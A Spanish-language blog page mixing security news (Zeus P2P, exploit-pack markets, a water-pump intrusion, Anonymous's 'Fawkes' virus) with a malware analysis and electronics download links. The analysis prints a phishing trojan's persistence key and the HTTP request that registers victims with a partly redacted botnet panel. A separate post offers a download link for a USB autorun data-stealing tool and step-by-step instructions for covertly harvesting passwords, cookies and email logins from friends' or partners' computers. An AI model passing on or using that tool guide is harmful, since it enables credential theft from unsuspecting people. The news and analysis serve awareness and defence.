Son todos unos muggles informaticos

El malware financiero Zeus se ha actualizado con una funcionalidad peer-to-peer que la hace mucho más resistente a los intentos de eliminarlo y da a sus controladores mayor flexibilidad para llevar a cabo sus fraudes.

La nueva versión del troyano Zeus ha sido descubierta y analizada por el experto suizo en seguridad Roman Hssy, creador de los servicios de seguimiento de Zeus y SpyEye abuse.ch.

Hace un año, los expertos en seguridad del suministrador de antivirus Trend Micro consiguieron asociar a Zeus un archivo de infección denominado LICAT, concluyendo que éste servía como plataforma de distribución para el troyano y para prologar sus infecciones.

LICAT utiliza un algoritmo especial para generar nombres de dominio aleatorios para realizar actualizaciones, Domain Generation Algorithm (DGA), de forma similar a como lo hacía el gusano Conficker, permitiendo que sus creadores sepan por adelantado qué dominios debe contrastar el malware en una fecha determinada y puedan registrarlos cuando deseen distribuir una nueva versión.

“Hace unas semanas me di cuenta de que no se habían registrado nuevos nombres de dominio murofet/LICAT para servidores de comando y control, lo que me extrañó. Por eso decidí analizar una muestra reciente de Zeus”, explica Hssy.

Fue así como Hssy descubrió la nueva variante. “Cuando corrí el código binario en mi sandbox, mi primera impresión fue que no se trataba de Zeus, pero tras analizar la infección concluí que si lo era”. Una vez instalada sobre un ordenador, la nueva variante de Zeus solicita un conjunto de direcciones IP codificadas que corresponden a otros sistemas infectados. Después, el troyano descarga una serie de IP de ellos y, si, tales sistemas están corriendo una versión más reciente, se actualiza.

Fuente: CSO España

Después de la gran repercusión que causó, tanto en el sector informático como en los medios de comunicación, el famoso virus de las foto multas, me llegó una muestra de un correo electrónico acerca de un presunto “paquete nacional en tránsito”.

Este correo electrónico, presuntamente proveniente de la “Oficina de correos (Info@correoargentino.com.ar)” anuncia al receptor del mensaje que tiene un paquete en tránsito y que lo recibirá solo cuando se utilice el sistema de “Pago contrarembolso”, para poder continuar con el trámite, se ve un link de descarga de un supuesto documento en PDF, el cual en realidad está apuntando a la siguiente URL:

http://an[BLOQUEADO]ub.net/file/4qpg-detalles_seguimiento-pdf.exe

Como nota adicional, noten en la siguiente imagen como incrustan dentro del cuerpo del correo el logo de una empresa de seguridad afirmando que el correo está libre de virus

Como se puede ver, el recurso de destino de la solicitud es en realidad un archivo ejecutable, el cual al ser descargado, mantiene el ícono de un documento PDF, actuando la totalidad de esta primera parte del malware como elemento de ingeniería social.

Al descargar el binario pude comprobar estáticamente los siguientes datos:

Nombre del archivo: 4qpg-detalles_seguimiento-pdf.exe
Tamaño del archivo: 53.248 bytes
MD5: A28C8FE956A51741B1FBE9FC3CCDA1DC

Continuando un poco más con el análisis estático, me encuentro que el malware no cuenta con ningún tipo de compresión o cifrado del código (algo realmente raro en estos días) y hasta se puede deducir, observando un poco el  binario, que está programado con Visual Basic 6.0 debido a su llamada a la librería MSVBVM60.DLL

Sin embargo, continuando la búsqueda dentro del binario, me sorprendí cuando vi que dentro de los strings del ejecutable, se podía leer donde se alojaba el proyecto original del mismo:

Como puede leerse dentro del binario, el proyecto se encontraba alojado en el perfil del usuario PA dentro de su escritorio, en una carpeta llamada vb6 Source, de hecho, el proyecto se llamaba originalmente Proyecto1.vbp. Más adelante dentro del binario, también podemos encontrar que el nombre original del archivo era: pamicard-botnet-test.exe.

Obviamente, ahí ya tenía un nickname para investigar. Continuando con el análisis estático, pude encontrar también  strings que refieren código a V0lk, combinando estas dos cosas, pude deducir de sin la necesidad de ejecutar el código que nos encontramos ante una variante de malware que utiliza la herramienta “V0lk-Botnet 4.0”.

Ahora bien, ya entrando en la etapa de análisis dinámico (que implica la ejecución de la muestra en un entorno controlado) pude observar el siguiente comportamiento:

Al momento de la ejecución, se agregar un archivo de las siguientes características en el sistema:

Destino: %Windows%\csrcs.exe
MD5: a28c8fe956a51741b1fbe9fc3ccda1dc

Agrega la siguiente rama de registro al sistema:

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\Run\Microsofts
Dato: %Windows%\csrcs.exe
Tipo: REG_SZ

Resuelve e intenta conectarse a la URL de la botnet en http://n[bloqueado]s.asia/priv8/bots.php y envía la siguiente información al la botnet registrando dentro de la red la nueva víctima:

User-Agent: 753cda8b05e32ef3b82e0ff947a4a936
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-cn
Content-Length: 46
Accept: */*
Host: n[bloqueado]s.asia
Connection: Keep-Alive

name=Administrator
so=Windows 2000
pasw=
file=
0 = CreateMutexW( 12d34c, 0, RasPbFile )

Obviamente, al ingresar a la URL donde se conecta el malware puede observarse el panel de control de la botnet V0lk, la cual se atribuye a grupos del underground mexicano, sin embargo, investigando el nickname dentro de la muestra, puedo atribuirla a algún scriptkiddie español.

Investigadores de la firma de seguridad danesa CSIS, han interceptado la difusión de un nuevo gusano da través de Facebook.

El gusano se propaga a través del muro del usuario mediante el envío de mensajes directos con los privilegios del usuario conectado. El mensaje se parece a una imagen pero en realidad es un archivo ejecutable SCR. El mensaje consiste únicamente de un enlace a sitios como: http://www.[ELIMINADO]ense.co.il/lang/images.php?facebookimagen=2119

El código está desarrollado en Visual Basic 6.0 y contiene numerosos trucos contra VMware, Sandboxie, Virtual Box, etc.

El gusano ya ha capturado un gran número de dominios desde los que se sigue reproduciendo y tras la ejecución, el malware descarga una variante del crimeware Zeus desde servidores web comprometidos en todo el mundo.

Programadores rusos han desarrollado una industria de suministro de software para criminales cibernéticos. Se trata de programas automatizados y sencillos de usar.

Los programadores de computación rusos han desarrollado una industria de suministro de software para criminales cibernéticos. Se trata de programas de hackeo automatizados y sencillos de usar, con los que se puede tomar el control de una computadora personal en cuestión de segundos.

El tipo de software malicioso, llamado “exploit pack” o paquetes de programas para hackers, se aprovecha de conocidos defectos en los programas más comúnmente usados como Adobe Reader e Internet Explorer, con el objetivo de hackear sin la necesidad de la intervención humana.

Los criminales pueden instalar virus o robar información bancaria sin necesidad de contar con un conocimiento especializado.

El mercado de estos paquetes informáticos imita al mercado del software legal. Por ejemplo, los vendedores les ofrecen a los criminales periodos para probar los productos, actualizaciones regulares e incluso 24 horas de apoyo técnico.

La duración de las licencias de los software varían, pues dependen de las necesidades de los hackers: un año de licencia cuesta alrededor de US$1.500, la de seis meses cuesta unos US$1.000 y la de tres meses puede costar sólo US$700.

Oferta y demanda

Algunos vendedores también ofrecen sus paquetes como un servicio que puede funcionar y se puede controlar en sus propios servidores. Es así como rentan el acceso a los mismos por alrededor de US$500 mensuales o US$200 semanales.

Algunos de los programas tienen como blanco Linux y sistemas basados en Mac, pero la mayoría están dirigidos a las computadoras de Windows.

Fyodor Yarochkin, un analista de Armorize Tecnologies, una empresa de seguridad informática, señaló que dichos programadores están llenando un vacío en el mercado.

“Los criminales quieren paquetes para hackear y esta gente se los provee”, indicó.

En su mayoría, indicó el experto, son programadores profesionales que previamente tuvieron trabajos legítimos con compañías grandes, pero que prefirieron trabajar independientemente y ganar un poco más de dinero.

Otros también son estudiantes de informática o de ciencias de la computación.

“Nosotros descubrimos un programador de ‘exploit pack’ que también tenía una investigación publicada en el sitio web de una universidad”, señaló Yarochkin.

Mercadeo

Debido a que la mayoría de los paquetes para hackers tienen las mismas funciones, los creadores ponen un gran esfuerzo en diseñar interfaces que sean atractivas y fáciles de usar para los usuarios.

Los nombres de los programas también se hacen en inglés. Algunos son siniestros como “Crimepack”, “Infector” y “Blackhole”. Pero algunos son más poéticos como “Phoenix” y “Eleanor” y otros tienen un toque de inocencia, como “Nicepack”.

El software es promocionado en foros clandestinos de hackers, a los cuales una persona sólo se puede unir si un miembro lo avaló.

Para hacer uso de un paquete de este tipo, un hacker necesita primero hackear un sitio web popular y legítimo o pagarle a alguien para que lo haga en su nombre.

Una vez que el sitio web ha sido hackeado, los visitantes al sitio son redirigidos sin ellos saberlo a la computadora que tiene el paquete malicioso funcionando.

El “exploit pack” intentará tomar el control de la computadora del visitante y, si tiene éxito, instala un virus y otros software maliciosos en la máquina.

Actualización

Los creadores de estos paquetes diseñan interfaces diferentes y fáciles de entender.

CSIS estima que los paquetes de hackeo toman el control, de forma exitosa, de alrededor 30% de las computadoras que son redirigidas hacia ellos.

Pero casi todos los defectos de los software que dichos paquetes aprovechan son bien conocidos y han sido solucionados en las últimas actualizaciones del programa afectado, dijo Puzic.

“Si usted hace una actualización de todo el software de su computador, deja de ser vulnerable a los ‘exploit packs’. Ellos funcionan sólo porque la mayoría de los usuarios de computadoras no actualizan sus software con regularidad”, indicó el especialista.

Los precios de los paquetes maliciosos han caído en los últimos meses, debido en parte a la piratería de los software.

Copias carentes de licencia de algunos paquetes han sido filtradas en sitios de hackers.

Algunos vendedores también han empezado a vender versiones no actualizadas de sus paquetes como estrategia promocional. Para compensar la disminución de los ingresos, muchos vendedores están ofreciendo servicios por una tarifa extra.

Uno de esos servicios consiste en ejecutar un virus para ver cuáles de los principales programas antivirus lo detecta. Si es descubierto, el virus puede ser modificado y puesto a prueba nuevamente hasta que evada cualquier detección.

Este servicio cuesta entre US$2 o US$3 cada vez que se haga o alrededor de US$50 como una cuota mensual.

Los vendedores también están vigilando las listas compiladas por compañías antivirus, en las cuales aparecen las direcciones de los servidores que ejecutan paquetes para hackers.

Con esa información, los vendedores les ofrecen a los criminales nuevas direcciones para actuar si ya han sido puestos en esos listados. ¿El precio? US$50.

Un grupo de ciberatacantes destruyeron un sistema para bombear agua potable a miles de casas en una ciudad de Illinois, Estados Unidos. Ahora, el FBI y el Departamento de Seguridad Nacional están investigando a un grupo de hackers, que se habrían inmiscuido en el sistema encendiéndolo y apagandolo repetidas veces hasta que se estropeó. A lo más Duro de Matar 4.0.

El incidente ocurrió el 8 de noviembre pasado, y se dio a conocer a través del blog de Joe Weiss, que aconseja a los sistemas que entregan servicios básicos sobre cómo proteger su hardware contra ataques. un reporte del Centro de Inteligencia de Illinois señala que los atacantes obtuvieron acceso al sistema usando nombres de usuario y contraseñas robadas a una compañía que desarrolla software de control para sistemas industriales. FAQ sobre lo sucedido.

La dirección desde donde se realizó el ataque fue rastreada hasta Rusia, y se reportaron anteriormente varios problemas con el acceso antes de que se destruyera el sistema, cosa que aparentemente no fue tomada demasiado en serio.
“En este momento no hay datos creíbles y corroborables que indiquen riesgo a entidades de infraestructura críticas o amenazas a la seguridad pública”, dijo Seguridad Nacional.

Poco después de estas declaraciones un sujeto bajo el nombre de “prof” dijo haber accedido a los sistemas de control de una segunda planta de tratamiento de agua estadounidense. El hacker posteó imágenes de lo que sería el sistema de control interno de una planta en South Houston. La autenticidad de estas imágenes no ha sido confirmada ni descartada todavía.

Este tipo de ataques sigue a grupos que se han enfocado en los sistemas de control y supervisión de plantas (llamados SCADA), que controlan filtros de agua, mezclas químicas, energía eléctrica, rutas de trenes, etc. Stuxnet el año pasado fue uno de los más claros ejemplos, deteniendo el funcionamiento de plantas nucleares en Irán.

Actualización 28/11: FBI y DHS dice que no se puede confirmar que el ataque haya existido.

Fuente: Fayerwayer

En días pasados, Anonymous publicó un video en el que, esta vez sí asegura que tiene la intención de lanzar un ataque de malware a través de Facebook, después del falso rumor que recorrió varios medios de comunicación donde se reveló que, el pasado cinco de noviembre, la red social sería atacada y que fue negado rotundamente por el grupo de hackivistas, vía Twitter.

El videocomunicado posteado en el blog Anonymous Central explica el lanzamiento de un virus dirigido a Facebook. Asimismo explica que el software malicioso conocido como “Virus Fawkes” es un “gusano muy sofisticado con la red de autoreplicación avanzada y capacidades de control de manera remota”.

No mucho tiempo después que el video fuera publicado, expertos de la empresa de seguridad BitDefender se encontraron con una estafa en Facebook, con una descripción en árabe, que prometía un nuevo video chat con funciones de voz.
El enlace dirigía a un archivo nombrado “scan_facebook.zip”. Aunque éste era de apariencia inocente contenía una variante del software malicioso conocido como Backdoor-Bifrose-AAJX.

“Anonymous le da la cordial bienvenida a los virus Fawkes, que fueron completamente hechos por programadores de Anonymous”, dijo la voz del video.

El virus, dicen los investigadores, “se inyecta en el proceso de Internet Explorer, proporciona al atacante remoto un acceso sin obstáculos al sistema comprometido, registra las pulsaciones de teclado y elimina varios procesos relacionados con soluciones antimalware”, tal como lo explican los de Anonymous en el video.

“Después de que el gusano está bajo control, Anonymous usará esto para su ventaja contra la corrupción y como un ataque alternativo contra sus oponentes” dijo el grupo hackivista.

Sin embargo, el virus descubierto por BitDefender, no tiene la autoreplicación que describieron los hackivistas, además de conectarse a un servidor remoto en Egipto, algo que no se mencionó en el video.

“Hasta el momento, a pesar de que esta amenaza se parece mucho a lo que Anonymous describió como su última arma en la batalla, su éxito es más bien poco. ¿Quizás esté Anonymous tratando de engañarnos? ¿Han creado un malware de verdad? ¿Es su intención lanzarlo o sólo evaluar la capacidad de reacción de los usuarios ante una amenaza? En cualquier caso, estamos ante una amenaza que está actuando en Facebook y que los usuarios deberían conocer para poder protegerse de ell”, dijo Jocelyn Otero Ovalle, Directora de Marketing de BitDefender para España y Portugal.

Si bien el malware existe en la red social, pero no se propaga tanto como decían, o todo es inventado y no existe tal gusano. Los expertos en seguridad mantendrán una estrecha vigilancia sobre la amenaza de ver cómo se transmite y cómo actúa.
Mientras tanto, habrá que asegurarse de que la base de datos de definiciones de virus esté actualizada y de mantenerse alejados de cualquier cosa que parezca sospechosa en Facebook.
 

Fuente: bSecure

Este progama lo que es robar todo tipo de informacion de la PC victima… lo que tenemos que hacer es cargar unos archivos a nuestro Pendrive o dispositivo USB y al meterlo en la PC victima automaticamente captura toda la info posible…. como por ejemplo: 

-toda clase de contraseñas del navegador web hi-5,myspace, e incluso de foros.. 

- historial de navegacion completo ( para darte cuenta del perfil de la victima y o amiga ) 

-cookies esto sabran mis amigos mas experimentados para lo que sirve 

-los clientes de correo tales como msn , yahoo, gmail y demas 

-toda la informacion de su hardware e ips 

-los puertos abiertos recientemente 

-licencias de los programas que tiene (incluidos windows ,adobe y demas) 

1.- descargas el archivo lo descomprimes y cortas todos los archivos (exepto el txt esas son las instrucciones que les puse) luego abres tu usb y pegas los 5 quedandote asi:


tambien puedes meter otros archivos en la usb o ponerlos como ocultos para no levantar sospechas 

nota: al momento de descargar y descomprimir te lo maracara como archivo peligroso es natural pues tiene el autorun pero no te preocupes no es peligroso para ti … 

2.- una vez preparado con tu llave de los secretos(tu usb) llegas a cualquier cyber o casa de amigo o novia o cualquier victima que le traigas ganas y bajo cualquier pretexto le insertas la usb esperas 10 segundos aprox o mas y la sacas ojo nunca abras ninguna de las 5 carpetas por que si no la cagaras te mandara un mensaje de deteccion el antivirus asi que mejor dejalo asi 

3.- llegas tranquilamente a tu pc y revisas la carpeta de tu usb llamada ‘dump’ observaras una carpeta con el nombre de la pc victima y dentro de ella ordenaditos varios archivos html revisas los archivos y veras lo que tienes a tu disposicion 

exploremos una carpeta aunque omitire las contraseñas y parte del correo por razones obvias 

lo que tenia la victima de contraseñas 



Descargar: 
http://www.4shared.com/file/gQzC1lv8/usb_robadatos.html

Aqui les dejo este gran manual con ilustraciones de como reparar un DISCO DURO espero les sirva

Se llama disco duro, disco solidó o disco rígido (en inglés hard disk, abreviado con frecuencia HD o HDD) al dispositivo encargado de almacenar información de forma permanente en una computadora. 



Contenido:

Conceptos y definiciones de disco duro y su Partes

Reparación de disco duro

Clonar Discos Duros

2 Sistemas Operativos en un mismo HD

Aprenda a seleccionar y optimizar su Rígido

Recuperar archivos borrados

Formatear disco duro e instalar Windows después

Particionar Disco Duro

Herramientas Para Reparar Discos Duros

recuperación de datos de discos duros, particiones.

Duplicar la capacidad del Disco Duro


http://www.megaupload.com/?d=C7MEJ3UK 

Bueno buscando buscando como siempre para entender sobre los cables hacerlos y todo eso me encontre con estos videos de electronica para aquellos como yo que no entendemos mucho….

* Introduccion
* Materiales
* Polarizacion de los circuitos integrados
* Compuertas Logicas
* Compuerta NOT
* Compuerta OR
* Compuerta AND
* Logica Combinacional
* Aplicaciones mas comunes
* Mediciones en los circuitos integrados
* Uso de una punta de prueba logica
* Flip-Flips Tipo D
* Circuitos COntadores
* Microprocesadores y Computadoras

Link de descarga:

http://www.mediafire.com/?zjgdkdqwodn



-Todo Sobre Diodos-


Entre los dispositivos semiconductores, el diodo es el más simple y el que tiene un compartimiento más facil de comprender. En un principio, la funcion principal de los diodos era rectificar señales alternas; pero en la actualidad, tiene diversas aplicaciones.
En este video se vera la construcción de un diodo, su principio de operación sus diversas variedades, etc.



http://www.megaupload.com/?d=2FU8EHIS
http://www.megaupload.com/?d=2YWUID5M
http://www.megaupload.com/?d=9II3H4E2
http://www.megaupload.com/?d=CGTBJ7SD


-Cómo Fabricar Circuitos Impresos y soldar componentes-


En este video aprenderás sencillas técnicas para construir tus propios circuitos impresos y la forma correcta de soldar componentes electrónicos.
Además, se comentara el porque es conveniente hacer pruebas y experimentar con circuitos de prueba antes de que hagas el circuito impreso final.
Se mostrara la forma de ensamblar circuitos electrónicos, con el objetivo de facilitar el procedimiento de soldadura. Para eso se usarán dos kits, el micrófono de transmisión en FM(Micrófono espía) y el amplificador de audio.
Final mente conocerás todos los materiales, químicos, herramientas y equipo minimo indispensable para hacer tus proyectos electrónicos en circuitos impresos.



http://www.megaupload.com/?d=3ZGWP74Z
http://www.megaupload.com/?d=CLYF3N12
http://www.megaupload.com/?d=LQRV2UU9
http://www.megaupload.com/?d=1FQ8QXB2


-Símbolos Electrónicos e Interpretación de Diagramas-


Los símbolos electrónicos sirven para representar de forma gráfica los distintos componentes de un circuito, de modo que una persona pueda diseñar un circuito sobre el papel, o para que pueda estudiarlo con base en un diagrama esquemático.
En este disco se estudiara, precisamente, la simbología electrónica y la forma en que debe ser interpretada; también se explicara como se puede construir un circuito a partir de un diagrama, y viceversa.



http://www.megaupload.com/?d=N93G5A8L
http://www.megaupload.com/?d=Y6TA6DBX
http://www.megaupload.com/?d=57ZAZRB6
http://www.megaupload.com/?d=HSB3S8MT
http://www.megaupload.com/?d=2BT4LSVO